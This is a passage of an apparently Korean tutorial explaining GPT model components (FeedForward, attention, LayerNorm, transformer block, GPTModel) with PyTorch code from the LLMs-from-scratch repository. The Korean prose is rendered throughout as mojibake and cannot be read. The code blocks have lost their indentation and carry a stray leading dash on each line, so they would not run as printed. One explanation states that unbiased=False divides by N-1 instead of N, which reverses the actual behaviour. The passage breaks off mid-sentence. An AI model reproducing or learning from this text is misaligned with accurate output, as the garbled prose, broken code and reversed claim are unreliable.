- -> [!NOTE] -> FeedForward ๋ ˆ์ด์–ด ๋‚ด์˜ ์„ ํ˜• ๋ ˆ์ด์–ด ๋’ค์—์„œ ์ด ํ•จ์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๋ชฉ์ ์€ ์„ ํ˜• ๋ฐ์ดํ„ฐ๋ฅผ ๋น„์„ ํ˜•์œผ๋กœ ๋ณ€๊ฒฝํ•˜์—ฌ ๋ชจ๋ธ์ด ๋ณต์žกํ•˜๊ณ  ๋น„์„ ํ˜•์ ์ธ ๊ด€๊ณ„๋ฅผ ํ•™์Šตํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. - -### **FeedForward ์‹ ๊ฒฝ๋ง** - -_ํ–‰๋ ฌ์˜ ํ˜•ํƒœ๋ฅผ ๋” ์ž˜ ์ดํ•ดํ•˜๊ธฐ ์œ„ํ•ด ์ฃผ์„์œผ๋กœ ํ˜•ํƒœ๊ฐ€ ์ถ”๊ฐ€๋˜์—ˆ์Šต๋‹ˆ๋‹ค:_ -```python -# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04 -class FeedForward(nn.Module): -def __init__(self, cfg): -super().__init__() -self.layers = nn.Sequential( -nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]), -GELU(), -nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]), -) - -def forward(self, x): -# x shape: (batch_size, seq_len, emb_dim) - -x = self.layers[0](x)# x shape: (batch_size, seq_len, 4 * emb_dim) -x = self.layers[1](x) # x shape remains: (batch_size, seq_len, 4 * emb_dim) -x = self.layers[2](x) # x shape: (batch_size, seq_len, emb_dim) -return x # Output shape: (batch_size, seq_len, emb_dim) -``` -#### **๋ชฉ์  ๋ฐ ๊ธฐ๋Šฅ** - -- **์œ„์น˜๋ณ„ FeedForward ๋„คํŠธ์›Œํฌ:** ๊ฐ ์œ„์น˜์— ๋Œ€ํ•ด ๋ณ„๋„๋กœ ๋™์ผํ•˜๊ฒŒ ๋‘ ๊ฐœ์˜ ์™„์ „ ์—ฐ๊ฒฐ ๋„คํŠธ์›Œํฌ๋ฅผ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **๋ ˆ์ด์–ด ์„ธ๋ถ€์‚ฌํ•ญ:** -- **์ฒซ ๋ฒˆ์งธ ์„ ํ˜• ๋ ˆ์ด์–ด:** ์ฐจ์›์„ `emb_dim`์—์„œ `4 * emb_dim`์œผ๋กœ ํ™•์žฅํ•ฉ๋‹ˆ๋‹ค. -- **GELU ํ™œ์„ฑํ™”:** ๋น„์„ ํ˜•์„ฑ์„ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **๋‘ ๋ฒˆ์งธ ์„ ํ˜• ๋ ˆ์ด์–ด:** ์ฐจ์›์„ ๋‹ค์‹œ `emb_dim`์œผ๋กœ ์ค„์ž…๋‹ˆ๋‹ค. - -> [!NOTE] -> ๋ณด์‹œ๋‹ค์‹œํ”ผ, Feed Forward ๋„คํŠธ์›Œํฌ๋Š” 3๊ฐœ์˜ ๋ ˆ์ด์–ด๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ์ฒซ ๋ฒˆ์งธ๋Š” ์„ ํ˜• ๋ ˆ์ด์–ด๋กœ, ์„ ํ˜• ๊ฐ€์ค‘์น˜(๋ชจ๋ธ ๋‚ด๋ถ€์—์„œ ํ›ˆ๋ จํ•  ๋งค๊ฐœ๋ณ€์ˆ˜)๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ฐจ์›์„ 4๋ฐฐ๋กœ ๊ณฑํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฐ ๋‹ค์Œ, GELU ํ•จ์ˆ˜๊ฐ€ ๋ชจ๋“  ์ฐจ์›์—์„œ ๋น„์„ ํ˜• ๋ณ€ํ™”๋ฅผ ์ ์šฉํ•˜์—ฌ ๋” ํ’๋ถ€ํ•œ ํ‘œํ˜„์„ ์บก์ฒ˜ํ•˜๊ณ , ๋งˆ์ง€๋ง‰์œผ๋กœ ๋˜ ๋‹ค๋ฅธ ์„ ํ˜• ๋ ˆ์ด์–ด๊ฐ€ ์›๋ž˜ ์ฐจ์› ํฌ๊ธฐ๋กœ ๋˜๋Œ๋ฆฝ๋‹ˆ๋‹ค. - -### **๋‹ค์ค‘ ํ—ค๋“œ ์ฃผ์˜ ๋ฉ”์ปค๋‹ˆ์ฆ˜** - -์ด๊ฒƒ์€ ์ด์ „ ์„น์…˜์—์„œ ์ด๋ฏธ ์„ค๋ช…๋˜์—ˆ์Šต๋‹ˆ๋‹ค. - -#### **๋ชฉ์  ๋ฐ ๊ธฐ๋Šฅ** - -- **๋‹ค์ค‘ ํ—ค๋“œ ์ž๊ธฐ ์ฃผ์˜:** ๋ชจ๋ธ์ด ํ† ํฐ์„ ์ธ์ฝ”๋”ฉํ•  ๋•Œ ์ž…๋ ฅ ์‹œํ€€์Šค ๋‚ด์˜ ๋‹ค์–‘ํ•œ ์œ„์น˜์— ์ง‘์ค‘ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. -- **์ฃผ์š” ๊ตฌ์„ฑ ์š”์†Œ:** -- **์ฟผ๋ฆฌ, ํ‚ค, ๊ฐ’:** ์ž…๋ ฅ์˜ ์„ ํ˜• ํ”„๋กœ์ ์…˜์œผ๋กœ, ์ฃผ์˜ ์ ์ˆ˜๋ฅผ ๊ณ„์‚ฐํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. -- **ํ—ค๋“œ:** ๋ณ‘๋ ฌ๋กœ ์‹คํ–‰๋˜๋Š” ์—ฌ๋Ÿฌ ์ฃผ์˜ ๋ฉ”์ปค๋‹ˆ์ฆ˜(`num_heads`), ๊ฐ ํ—ค๋“œ๋Š” ์ถ•์†Œ๋œ ์ฐจ์›(`head_dim`)์„ ๊ฐ€์ง‘๋‹ˆ๋‹ค. -- **์ฃผ์˜ ์ ์ˆ˜:** ์ฟผ๋ฆฌ์™€ ํ‚ค์˜ ๋‚ด์ ์„ ๊ณ„์‚ฐํ•˜์—ฌ ์Šค์ผ€์ผ๋ง ๋ฐ ๋งˆ์Šคํ‚นํ•ฉ๋‹ˆ๋‹ค. -- **๋งˆ์Šคํ‚น:** ๋ฏธ๋ž˜์˜ ํ† ํฐ์— ์ฃผ์˜๋ฅผ ๊ธฐ์šธ์ด์ง€ ์•Š๋„๋ก ์ธ๊ณผ ๋งˆ์Šคํฌ๊ฐ€ ์ ์šฉ๋ฉ๋‹ˆ๋‹ค(์ž๊ธฐ ํšŒ๊ท€ ๋ชจ๋ธ์ธ GPT์™€ ๊ฐ™์€ ๊ฒฝ์šฐ ์ค‘์š”). -- **์ฃผ์˜ ๊ฐ€์ค‘์น˜:** ๋งˆ์Šคํ‚น๋˜๊ณ  ์Šค์ผ€์ผ๋œ ์ฃผ์˜ ์ ์ˆ˜์˜ ์†Œํ”„ํŠธ๋งฅ์Šค์ž…๋‹ˆ๋‹ค. -- **์ปจํ…์ŠคํŠธ ๋ฒกํ„ฐ:** ์ฃผ์˜ ๊ฐ€์ค‘์น˜์— ๋”ฐ๋ผ ๊ฐ’์˜ ๊ฐ€์ค‘ ํ•ฉ์ž…๋‹ˆ๋‹ค. -- **์ถœ๋ ฅ ํ”„๋กœ์ ์…˜:** ๋ชจ๋“  ํ—ค๋“œ์˜ ์ถœ๋ ฅ์„ ๊ฒฐํ•ฉํ•˜๋Š” ์„ ํ˜• ๋ ˆ์ด์–ด์ž…๋‹ˆ๋‹ค. - -> [!NOTE] -> ์ด ๋„คํŠธ์›Œํฌ์˜ ๋ชฉํ‘œ๋Š” ๋™์ผํ•œ ์ปจํ…์ŠคํŠธ ๋‚ด์—์„œ ํ† ํฐ ๊ฐ„์˜ ๊ด€๊ณ„๋ฅผ ์ฐพ๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ๋˜ํ•œ, ํ† ํฐ์€ ๊ณผ์ ํ•ฉ์„ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•ด ์„œ๋กœ ๋‹ค๋ฅธ ํ—ค๋“œ๋กœ ๋‚˜๋‰˜์ง€๋งŒ, ๊ฐ ํ—ค๋“œ์—์„œ ๋ฐœ๊ฒฌ๋œ ์ตœ์ข… ๊ด€๊ณ„๋Š” ์ด ๋„คํŠธ์›Œํฌ์˜ ๋์—์„œ ๊ฒฐํ•ฉ๋ฉ๋‹ˆ๋‹ค. -> -> ๋˜ํ•œ, ํ›ˆ๋ จ ์ค‘์— **์ธ๊ณผ ๋งˆ์Šคํฌ**๊ฐ€ ์ ์šฉ๋˜์–ด ๋‚˜์ค‘์˜ ํ† ํฐ์ด ํŠน์ • ํ† ํฐ๊ณผ์˜ ๊ด€๊ณ„๋ฅผ ์ฐพ์„ ๋•Œ ๊ณ ๋ ค๋˜์ง€ ์•Š์œผ๋ฉฐ, **๊ณผ์ ํ•ฉ ๋ฐฉ์ง€**๋ฅผ ์œ„ํ•ด ์ผ๋ถ€ **๋“œ๋กญ์•„์›ƒ**๋„ ์ ์šฉ๋ฉ๋‹ˆ๋‹ค. - -### **๋ ˆ์ด์–ด** ์ •๊ทœํ™” -```python -# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04 -class LayerNorm(nn.Module): -def __init__(self, emb_dim): -super().__init__() -self.eps = 1e-5 # Prevent division by zero during normalization. -self.scale = nn.Parameter(torch.ones(emb_dim)) -self.shift = nn.Parameter(torch.zeros(emb_dim)) - -def forward(self, x): -mean = x.mean(dim=-1, keepdim=True) -var = x.var(dim=-1, keepdim=True, unbiased=False) -norm_x = (x - mean) / torch.sqrt(var + self.eps) -return self.scale * norm_x + self.shift -``` -#### **๋ชฉ์  ๋ฐ ๊ธฐ๋Šฅ** - -- **๋ ˆ์ด์–ด ์ •๊ทœํ™”:** ๋ฐฐ์น˜์˜ ๊ฐ ๊ฐœ๋ณ„ ์˜ˆ์ œ์— ๋Œ€ํ•ด ํŠน์„ฑ(์ž„๋ฒ ๋”ฉ ์ฐจ์›) ์ „๋ฐ˜์— ๊ฑธ์ณ ์ž…๋ ฅ์„ ์ •๊ทœํ™”ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ๊ธฐ์ˆ ์ž…๋‹ˆ๋‹ค. -- **๊ตฌ์„ฑ ์š”์†Œ:** -- **`eps`:** ์ •๊ทœํ™” ์ค‘ 0์œผ๋กœ ๋‚˜๋ˆ„๋Š” ๊ฒƒ์„ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•ด ๋ถ„์‚ฐ์— ์ถ”๊ฐ€๋˜๋Š” ์ž‘์€ ์ƒ์ˆ˜(`1e-5`). -- **`scale` ๋ฐ `shift`:** ๋ชจ๋ธ์ด ์ •๊ทœํ™”๋œ ์ถœ๋ ฅ์„ ์Šค์ผ€์ผํ•˜๊ณ  ์ด๋™ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” ํ•™์Šต ๊ฐ€๋Šฅํ•œ ๋งค๊ฐœ๋ณ€์ˆ˜(`nn.Parameter`). ๊ฐ๊ฐ 1๊ณผ 0์œผ๋กœ ์ดˆ๊ธฐํ™”๋ฉ๋‹ˆ๋‹ค. -- **์ •๊ทœํ™” ๊ณผ์ •:** -- **ํ‰๊ท  ๊ณ„์‚ฐ(`mean`):** ์ž„๋ฒ ๋”ฉ ์ฐจ์›(`dim=-1`)์— ๊ฑธ์ณ ์ž…๋ ฅ `x`์˜ ํ‰๊ท ์„ ๊ณ„์‚ฐํ•˜๋ฉฐ, ๋ธŒ๋กœ๋“œ์บ์ŠคํŒ…์„ ์œ„ํ•ด ์ฐจ์›์„ ์œ ์ง€ํ•ฉ๋‹ˆ๋‹ค(`keepdim=True`). -- **๋ถ„์‚ฐ ๊ณ„์‚ฐ(`var`):** ์ž„๋ฒ ๋”ฉ ์ฐจ์›์— ๊ฑธ์ณ `x`์˜ ๋ถ„์‚ฐ์„ ๊ณ„์‚ฐํ•˜๋ฉฐ, ์ฐจ์›์„ ์œ ์ง€ํ•ฉ๋‹ˆ๋‹ค. `unbiased=False` ๋งค๊ฐœ๋ณ€์ˆ˜๋Š” ๋ถ„์‚ฐ์ด ํŽธํ–ฅ ์ถ”์ •๊ธฐ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๊ณ„์‚ฐ๋˜๋„๋ก ๋ณด์žฅํ•ฉ๋‹ˆ๋‹ค(N์œผ๋กœ ๋‚˜๋ˆ„๊ธฐ ๋Œ€์‹  N-1๋กœ ๋‚˜๋ˆ„๊ธฐ), ์ด๋Š” ์ƒ˜ํ”Œ์ด ์•„๋‹Œ ํŠน์„ฑ์— ๋Œ€ํ•ด ์ •๊ทœํ™”ํ•  ๋•Œ ์ ํ•ฉํ•ฉ๋‹ˆ๋‹ค. -- **์ •๊ทœํ™”(`norm_x`):** `x`์—์„œ ํ‰๊ท ์„ ๋นผ๊ณ  ๋ถ„์‚ฐ์— `eps`๋ฅผ ๋”ํ•œ ๊ฐ’์˜ ์ œ๊ณฑ๊ทผ์œผ๋กœ ๋‚˜๋ˆ•๋‹ˆ๋‹ค. -- **์Šค์ผ€์ผ ๋ฐ ์ด๋™:** ์ •๊ทœํ™”๋œ ์ถœ๋ ฅ์— ํ•™์Šต ๊ฐ€๋Šฅํ•œ `scale` ๋ฐ `shift` ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. - -> [!NOTE] -> ๋ชฉํ‘œ๋Š” ๋™์ผํ•œ ํ† ํฐ์˜ ๋ชจ๋“  ์ฐจ์›์—์„œ ํ‰๊ท ์ด 0์ด๊ณ  ๋ถ„์‚ฐ์ด 1์ด ๋˜๋„๋ก ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด๋Š” **๋”ฅ ๋‰ด๋Ÿด ๋„คํŠธ์›Œํฌ์˜ ํ›ˆ๋ จ์„ ์•ˆ์ •ํ™”**ํ•˜๊ธฐ ์œ„ํ•ด ๋‚ด๋ถ€ ๊ณต๋ณ€๋Ÿ‰ ์ด๋™์„ ์ค„์ด๋Š” ๊ฒƒ์„ ๋ชฉํ‘œ๋กœ ํ•˜๋ฉฐ, ์ด๋Š” ํ›ˆ๋ จ ์ค‘ ๋งค๊ฐœ๋ณ€์ˆ˜ ์—…๋ฐ์ดํŠธ๋กœ ์ธํ•ด ๋„คํŠธ์›Œํฌ ํ™œ์„ฑํ™”์˜ ๋ถ„ํฌ ๋ณ€ํ™”์™€ ๊ด€๋ จ์ด ์žˆ์Šต๋‹ˆ๋‹ค. - -### **ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก** - -_ํ–‰๋ ฌ์˜ ํ˜•ํƒœ๋ฅผ ๋” ์ž˜ ์ดํ•ดํ•˜๊ธฐ ์œ„ํ•ด ์ฃผ์„์œผ๋กœ ์ถ”๊ฐ€๋˜์—ˆ์Šต๋‹ˆ๋‹ค:_ -```python -# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04 - -class TransformerBlock(nn.Module): -def __init__(self, cfg): -super().__init__() -self.att = MultiHeadAttention( -d_in=cfg["emb_dim"], -d_out=cfg["emb_dim"], -context_length=cfg["context_length"], -num_heads=cfg["n_heads"], -dropout=cfg["drop_rate"], -qkv_bias=cfg["qkv_bias"] -) -self.ff = FeedForward(cfg) -self.norm1 = LayerNorm(cfg["emb_dim"]) -self.norm2 = LayerNorm(cfg["emb_dim"]) -self.drop_shortcut = nn.Dropout(cfg["drop_rate"]) - -def forward(self, x): -# x shape: (batch_size, seq_len, emb_dim) - -# Shortcut connection for attention block -shortcut = x # shape: (batch_size, seq_len, emb_dim) -x = self.norm1(x) # shape remains (batch_size, seq_len, emb_dim) -x = self.att(x) # shape: (batch_size, seq_len, emb_dim) -x = self.drop_shortcut(x) # shape remains (batch_size, seq_len, emb_dim) -x = x + shortcut # shape: (batch_size, seq_len, emb_dim) - -# Shortcut connection for feedforward block -shortcut = x # shape: (batch_size, seq_len, emb_dim) -x = self.norm2(x) # shape remains (batch_size, seq_len, emb_dim) -x = self.ff(x) # shape: (batch_size, seq_len, emb_dim) -x = self.drop_shortcut(x) # shape remains (batch_size, seq_len, emb_dim) -x = x + shortcut # shape: (batch_size, seq_len, emb_dim) - -return x # Output shape: (batch_size, seq_len, emb_dim) - -``` -#### **๋ชฉ์  ๋ฐ ๊ธฐ๋Šฅ** - -- **๋ ˆ์ด์–ด ๊ตฌ์„ฑ:** ๋‹ค์ค‘ ํ—ค๋“œ ์ฃผ์˜, ํ”ผ๋“œํฌ์›Œ๋“œ ๋„คํŠธ์›Œํฌ, ๋ ˆ์ด์–ด ์ •๊ทœํ™” ๋ฐ ์ž”์ฐจ ์—ฐ๊ฒฐ์„ ๊ฒฐํ•ฉํ•ฉ๋‹ˆ๋‹ค. -- **๋ ˆ์ด์–ด ์ •๊ทœํ™”:** ์•ˆ์ •์ ์ธ ํ›ˆ๋ จ์„ ์œ„ํ•ด ์ฃผ์˜ ๋ฐ ํ”ผ๋“œํฌ์›Œ๋“œ ๋ ˆ์ด์–ด ์ „์— ์ ์šฉ๋ฉ๋‹ˆ๋‹ค. -- **์ž”์ฐจ ์—ฐ๊ฒฐ (๋‹จ์ถ•ํ‚ค):** ๋ ˆ์ด์–ด์˜ ์ž…๋ ฅ์„ ์ถœ๋ ฅ์— ์ถ”๊ฐ€ํ•˜์—ฌ ๊ทธ๋ž˜๋””์–ธํŠธ ํ๋ฆ„์„ ๊ฐœ์„ ํ•˜๊ณ  ๊นŠ์€ ๋„คํŠธ์›Œํฌ์˜ ํ›ˆ๋ จ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. -- **๋“œ๋กญ์•„์›ƒ:** ์ •๊ทœํ™”๋ฅผ ์œ„ํ•ด ์ฃผ์˜ ๋ฐ ํ”ผ๋“œํฌ์›Œ๋“œ ๋ ˆ์ด์–ด ํ›„์— ์ ์šฉ๋ฉ๋‹ˆ๋‹ค. - -#### **๋‹จ๊ณ„๋ณ„ ๊ธฐ๋Šฅ** - -1. **์ฒซ ๋ฒˆ์งธ ์ž”์ฐจ ๊ฒฝ๋กœ (์ž๊ธฐ ์ฃผ์˜):** -- **์ž…๋ ฅ (`shortcut`):** ์ž”์ฐจ ์—ฐ๊ฒฐ์„ ์œ„ํ•ด ์›๋ž˜ ์ž…๋ ฅ์„ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. -- **๋ ˆ์ด์–ด ์ •๊ทœํ™” (`norm1`):** ์ž…๋ ฅ์„ ์ •๊ทœํ™”ํ•ฉ๋‹ˆ๋‹ค. -- **๋‹ค์ค‘ ํ—ค๋“œ ์ฃผ์˜ (`att`):** ์ž๊ธฐ ์ฃผ์˜๋ฅผ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **๋“œ๋กญ์•„์›ƒ (`drop_shortcut`):** ์ •๊ทœํ™”๋ฅผ ์œ„ํ•ด ๋“œ๋กญ์•„์›ƒ์„ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **์ž”์ฐจ ์ถ”๊ฐ€ (`x + shortcut`):** ์›๋ž˜ ์ž…๋ ฅ๊ณผ ๊ฒฐํ•ฉํ•ฉ๋‹ˆ๋‹ค. -2. **๋‘ ๋ฒˆ์งธ ์ž”์ฐจ ๊ฒฝ๋กœ (ํ”ผ๋“œํฌ์›Œ๋“œ):** -- **์ž…๋ ฅ (`shortcut`):** ๋‹ค์Œ ์ž”์ฐจ ์—ฐ๊ฒฐ์„ ์œ„ํ•ด ์—…๋ฐ์ดํŠธ๋œ ์ž…๋ ฅ์„ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. -- **๋ ˆ์ด์–ด ์ •๊ทœํ™” (`norm2`):** ์ž…๋ ฅ์„ ์ •๊ทœํ™”ํ•ฉ๋‹ˆ๋‹ค. -- **ํ”ผ๋“œํฌ์›Œ๋“œ ๋„คํŠธ์›Œํฌ (`ff`):** ํ”ผ๋“œํฌ์›Œ๋“œ ๋ณ€ํ™˜์„ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **๋“œ๋กญ์•„์›ƒ (`drop_shortcut`):** ๋“œ๋กญ์•„์›ƒ์„ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **์ž”์ฐจ ์ถ”๊ฐ€ (`x + shortcut`):** ์ฒซ ๋ฒˆ์งธ ์ž”์ฐจ ๊ฒฝ๋กœ์˜ ์ž…๋ ฅ๊ณผ ๊ฒฐํ•ฉํ•ฉ๋‹ˆ๋‹ค. - -> [!NOTE] -> ๋ณ€ํ™˜๊ธฐ ๋ธ”๋ก์€ ๋ชจ๋“  ๋„คํŠธ์›Œํฌ๋ฅผ ํ•จ๊ป˜ ๊ทธ๋ฃนํ™”ํ•˜๊ณ  ํ›ˆ๋ จ ์•ˆ์ •์„ฑ๊ณผ ๊ฒฐ๊ณผ๋ฅผ ๊ฐœ์„ ํ•˜๊ธฐ ์œ„ํ•ด ์ผ๋ถ€ **์ •๊ทœํ™”** ๋ฐ **๋“œ๋กญ์•„์›ƒ**์„ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค.\ -> ๊ฐ ๋„คํŠธ์›Œํฌ ์‚ฌ์šฉ ํ›„ ๋“œ๋กญ์•„์›ƒ์ด ์ˆ˜ํ–‰๋˜๊ณ  ์ •๊ทœํ™”๊ฐ€ ์ ์šฉ๋˜๋Š” ๋ฐฉ์‹์„ ์ฃผ๋ชฉํ•˜์„ธ์š”. -> -> ๋˜ํ•œ, **๋„คํŠธ์›Œํฌ์˜ ์ถœ๋ ฅ์„ ์ž…๋ ฅ์— ์ถ”๊ฐ€ํ•˜๋Š”** ๋‹จ์ถ•ํ‚ค๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์ดˆ๊ธฐ ๋ ˆ์ด์–ด๊ฐ€ ๋งˆ์ง€๋ง‰ ๋ ˆ์ด์–ด๋งŒํผ ๊ธฐ์—ฌํ•˜๋„๋ก ํ•˜์—ฌ ์†Œ์‹ค ๊ทธ๋ž˜๋””์–ธํŠธ ๋ฌธ์ œ๋ฅผ ๋ฐฉ์ง€ํ•˜๋Š” ๋ฐ ๋„์›€์ด ๋ฉ๋‹ˆ๋‹ค. - -### **GPTModel** - -_ํ–‰๋ ฌ์˜ ํ˜•ํƒœ๋ฅผ ๋” ์ž˜ ์ดํ•ดํ•˜๊ธฐ ์œ„ํ•ด ์ฃผ์„์œผ๋กœ ํ˜•ํƒœ๊ฐ€ ์ถ”๊ฐ€๋˜์—ˆ์Šต๋‹ˆ๋‹ค:_ -```python -# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04 -class GPTModel(nn.Module): -def __init__(self, cfg): -super().__init__() -self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"]) -# shape: (vocab_size, emb_dim) - -self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"]) -# shape: (context_length, emb_dim) - -self.drop_emb = nn.Dropout(cfg["drop_rate"]) - -self.trf_blocks = nn.Sequential( -*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])] -) -# Stack of TransformerBlocks - -self.final_norm = LayerNorm(cfg["emb_dim"]) -self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False) -# shape: (emb_dim, vocab_size) - -def forward(self, in_idx): -# in_idx shape: (batch_size, seq_len) -batch_size, seq_len = in_idx.shape - -# Token embeddings -tok_embeds = self.tok_emb(in_idx) -# shape: (batch_size, seq_len, emb_dim) - -# Positional embeddings -pos_indices = torch.arange(seq_len, device=in_idx.device) -# shape: (seq_len,) -pos_embeds = self.pos_emb(pos_indices) -# shape: (seq_len, emb_dim) - -# Add token and positional embeddings -x = tok_embeds + pos_embeds # Broadcasting over batch dimension -# x shape: (batch_size, seq_len, emb_dim) - -x = self.drop_emb(x) # Dropout applied -# x shape remains: (batch_size, seq_len, emb_dim) - -x = self.trf_blocks(x) # Pass through Transformer blocks -# x shape remains: (batch_size, seq_len, emb_dim) - -x = self.final_norm(x) # Final LayerNorm -# x shape remains: (batch_size, seq_len, emb_dim) - -logits = self.out_head(x) # Project to vocabulary size -# logits shape: (batch_size, seq_len, vocab_size) - -return logits # Output shape: (batch_size, seq_len, vocab_size) -``` -#### **๋ชฉ์  ๋ฐ ๊ธฐ๋Šฅ** - -- **์ž„๋ฒ ๋”ฉ ๋ ˆ์ด์–ด:** -- **ํ† ํฐ ์ž„๋ฒ ๋”ฉ (`tok_emb`):** ํ† ํฐ ์ธ๋ฑ์Šค๋ฅผ ์ž„๋ฒ ๋”ฉ์œผ๋กœ ๋ณ€ํ™˜ํ•ฉ๋‹ˆ๋‹ค. ์ƒ๊ธฐ ์ฐธ๊ณ , ์ด๋Š” ์–ดํœ˜์˜ ๊ฐ ํ† ํฐ์˜ ๊ฐ ์ฐจ์›์— ์ฃผ์–ด์ง„ ๊ฐ€์ค‘์น˜์ž…๋‹ˆ๋‹ค. -- **์œ„์น˜ ์ž„๋ฒ ๋”ฉ (`pos_emb`):** ์ž„๋ฒ ๋”ฉ์— ์œ„์น˜ ์ •๋ณด๋ฅผ ์ถ”๊ฐ€ํ•˜์—ฌ ํ† ํฐ์˜ ์ˆœ์„œ๋ฅผ ์บก์ฒ˜ํ•ฉ๋‹ˆ๋‹ค. ์ƒ๊ธฐ ์ฐธ๊ณ , ์ด๋Š” ํ…์ŠคํŠธ์—์„œ์˜ ์œ„์น˜์— ๋”ฐ๋ผ ํ† ํฐ์— ์ฃผ์–ด์ง„ ๊ฐ€์ค‘์น˜์ž…๋‹ˆ๋‹ค. -- **๋“œ๋กญ์•„์›ƒ (`drop_emb`):** ์ •๊ทœํ™”๋ฅผ ์œ„ํ•ด ์ž„๋ฒ ๋”ฉ์— ์ ์šฉ๋ฉ๋‹ˆ๋‹ค. -- **ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก (`trf_blocks`):** ์ž„๋ฒ ๋”ฉ์„ ์ฒ˜๋ฆฌํ•˜๊ธฐ ์œ„ํ•œ `n_layers` ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก์˜ ์Šคํƒ์ž…๋‹ˆ๋‹ค. -- **์ตœ์ข… ์ •๊ทœํ™” (`final_norm`):** ์ถœ๋ ฅ ๋ ˆ์ด์–ด ์ด์ „์˜ ๋ ˆ์ด์–ด ์ •๊ทœํ™”์ž…๋‹ˆ๋‹ค. -- **์ถœ๋ ฅ ๋ ˆ์ด์–ด (`out_head`):** ์ตœ์ข… ์€๋‹‰ ์ƒํƒœ๋ฅผ ์–ดํœ˜ ํฌ๊ธฐ๋กœ ํ”„๋กœ์ ์…˜ํ•˜์—ฌ ์˜ˆ์ธก์„ ์œ„ํ•œ ๋กœ์ง“์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. - -> [!NOTE] -> ์ด ํด๋ž˜์Šค์˜ ๋ชฉํ‘œ๋Š” **์‹œํ€€์Šค์—์„œ ๋‹ค์Œ ํ† ํฐ์„ ์˜ˆ์ธกํ•˜๊ธฐ ์œ„ํ•ด** ์–ธ๊ธ‰๋œ ๋ชจ๋“  ๋‹ค๋ฅธ ๋„คํŠธ์›Œํฌ๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด๋Š” ํ…์ŠคํŠธ ์ƒ์„ฑ๊ณผ ๊ฐ™์€ ์ž‘์—…์— ๊ธฐ๋ณธ์ ์ž…๋‹ˆ๋‹ค. -> -> ์–ผ๋งˆ๋‚˜ ๋งŽ์€ ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก์ด **์ง€์ •๋œ ๋Œ€๋กœ ์‚ฌ์šฉ๋  ๊ฒƒ์ธ์ง€** ์ฃผ๋ชฉํ•˜๊ณ , ๊ฐ ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก์ด ํ•˜๋‚˜์˜ ๋ฉ€ํ‹ฐ ํ—ค๋“œ ์–ดํ…์…˜ ๋„คํŠธ์›Œํฌ, ํ•˜๋‚˜์˜ ํ”ผ๋“œ ํฌ์›Œ๋“œ ๋„คํŠธ์›Œํฌ ๋ฐ ์—ฌ๋Ÿฌ ์ •๊ทœํ™”๋ฅผ ์‚ฌ์šฉํ•˜๋Š”์ง€ ์ฃผ๋ชฉํ•˜์‹ญ์‹œ์˜ค. ๋”ฐ๋ผ์„œ 12๊ฐœ์˜ ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก์ด ์‚ฌ์šฉ๋˜๋ฉด ์ด๋ฅผ 12๋กœ ๊ณฑํ•ฉ๋‹ˆ๋‹ค. -> -> ๊ฒŒ๋‹ค๊ฐ€, **์ •๊ทœํ™”** ๋ ˆ์ด์–ด๊ฐ€ **์ถœ๋ ฅ** ์ด์ „์— ์ถ”๊ฐ€๋˜๊ณ , ์ตœ์ข… ์„ ํ˜• ๋ ˆ์ด์–ด๊ฐ€ ๋์— ์ ์šฉ๋˜์–ด ์ ์ ˆํ•œ ์ฐจ์›์˜ ๊ฒฐ๊ณผ๋ฅผ ์–ป์Šต๋‹ˆ๋‹ค. ๊ฐ ์ตœ์ข… ๋ฒกํ„ฐ๊ฐ€ ์‚ฌ์šฉ๋œ ์–ดํœ˜์˜ ํฌ๊ธฐ๋ฅผ ๊ฐ€์ง€๋Š” ์ด์œ ๋Š” ์–ดํœ˜ ๋‚ด์˜ 